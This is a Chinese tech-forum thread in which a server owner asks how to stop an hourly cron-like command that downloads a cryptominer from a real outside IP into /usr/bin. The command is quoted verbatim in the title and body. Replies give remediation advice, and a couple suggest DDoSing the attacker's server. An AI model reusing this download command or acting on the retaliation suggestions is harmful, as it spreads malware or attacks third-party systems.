V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
ying5201314
V2EX  ›  Linux

求助,每小时被执行恶意下载挖矿程序 wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee 求大佬

  •  
  •   ying5201314 · 2020-04-18 11:15:18 +08:00 · 4988 次点击
    这是一个创建于 1709 天前的主题,其中的信息可能已经有所发展或是发生改变。
    wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
    ip 103.27.42.76 是日本
    每小时执行的恶意命令,如何找到执行的文件在位置,或者是不要他运行,wget 能卸载么
    没有找到定时任务
    27 条回复    2020-04-21 13:40:01 +08:00
    sadwin
        1
    sadwin  
       2020-04-18 11:32:04 +08:00
    有在跑 redis 吗? 有可能是 redis 被黑了
    Hurriance
        2
    Hurriance  
       2020-04-18 11:34:25 +08:00
    redis 上密码
    renmu
        3
    renmu  
       2020-04-18 11:34:25 +08:00 via Android
    cron 里没有?最好的方法就是重装系统
    claysec
        4
    claysec  
       2020-04-18 11:38:40 +08:00
    没有重要东西就直接重装系统。
    sadwin
        5
    sadwin  
       2020-04-18 11:45:14 +08:00
    GGGG430
        6
    GGGG430  
       2020-04-18 11:45:57 +08:00   ❤️ 1
    首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
    其次可以通过 alias 重命名 wget 为其他命令
    cnzjl
        7
    cnzjl  
       2020-04-18 11:48:23 +08:00
    最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令
    ik
        8
    ik  
       2020-04-18 13:42:34 +08:00 via iPhone   ❤️ 1
    建议重装,想排查问题可以先
    > /usr/bin/uvggee
    chmod 000 /usr/bin/uvggee
    chattr +i /usr/bin/uvggee
    然后再排查问题
    imdong
        9
    imdong  
       2020-04-18 14:23:47 +08:00   ❤️ 2
    非专业,笨笨的方法:

    比如自己写一个 shell 命名为 wget,然后在里面获取一些父进程信息?
    然后用这个 shell 替换(覆盖) wget ??
    won
        10
    won  
       2020-04-18 14:32:35 +08:00   ❤️ 3
    1 top 到进程号
    2 ll 到执行位置
    3 rm 掉
    4 crontab 里删除,并添加一个 1 分钟守护
    5 restart
    i999999
        11
    i999999  
       2020-04-18 15:20:05 +08:00 via Android   ❤️ 1
    建议重装系统,没办法重装的话可以把 wget 和 curl 工具重命名
    guog
        12
    guog  
       2020-04-18 15:23:14 +08:00 via Android   ❤️ 1
    七天了,楼主这个问题还没解决?大家给你的方案你试过了吗
    Rxianbei
        13
    Rxianbei  
       2020-04-18 15:23:47 +08:00 via Android
    @cnzjl 老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis,但是没有公网,装了都大半年了,想来也后怕,请问应该怎么排查?
    ying5201314
        14
    ying5201314  
    OP
       2020-04-18 17:11:32 +08:00
    试过了,主要不能重装,不然早解决
    ying5201314
        15
    ying5201314  
    OP
       2020-04-18 17:16:49 +08:00
    试过了,主要不能重装,不然早解决 1
    @guog
    defunct9
        16
    defunct9  
       2020-04-18 17:28:34 +08:00 via iPhone
    开 ssh,让我上去看看
    xupefei
        17
    xupefei  
       2020-04-18 17:30:06 +08:00 via iPhone
    还有个可能是服务器跑了 yarn 。
    Guys
        18
    Guys  
       2020-04-18 17:51:04 +08:00
    先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.
    musi
        19
    musi  
       2020-04-18 17:51:28 +08:00
    你在 v2 上发个求 d 帖把那个服务器 d 挂就好了
    xingheng
        20
    xingheng  
       2020-04-18 19:34:05 +08:00
    pstree 找到是哪个主进程启动的 wget,然后删除主进程的执行文件就行了吧。难道还有守护进程??尝试 watch+pstree 。
    patx
        21
    patx  
       2020-04-18 19:43:31 +08:00
    发到全球 ddos 论坛上去
    JustSong
        22
    JustSong  
       2020-04-19 00:21:38 +08:00 via Android
    可以用防火墙进行限制么
    Hades300
        23
    Hades300  
       2020-04-19 07:13:04 +08:00 via Android
    用 iptables drop 包就完事了
    msg7086
        24
    msg7086  
       2020-04-19 17:49:41 +08:00   ❤️ 1
    既然能写入 /usr/bin,那说明别人已经拿到了 root 权限,那从内核到系统文件,所有的程序都可能会被换掉,你不重装难道留着过劳动节么。
    realpg
        25
    realpg  
       2020-04-19 22:00:41 +08:00
    我猜你是 centos
    cnzjl
        26
    cnzjl  
       2020-04-20 09:42:08 +08:00
    @Rxianbei 排查下 cup 占用高的进程, 看看有没有可疑的 vbs 脚本,是否为远程下载的脚本~
    zhao305149619
        27
    zhao305149619  
       2020-04-21 13:40:01 +08:00
    这种一般有 cron 的定时脚本,还有就是会有一个低 cpu 利用率的 deamon 的进程不易被发现,所以有时候发现把 cron 停掉之后过一会还是会出现。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5985 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 42ms · UTC 03:08 · PVG 11:08 · LAX 19:08 · JFK 22:08
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.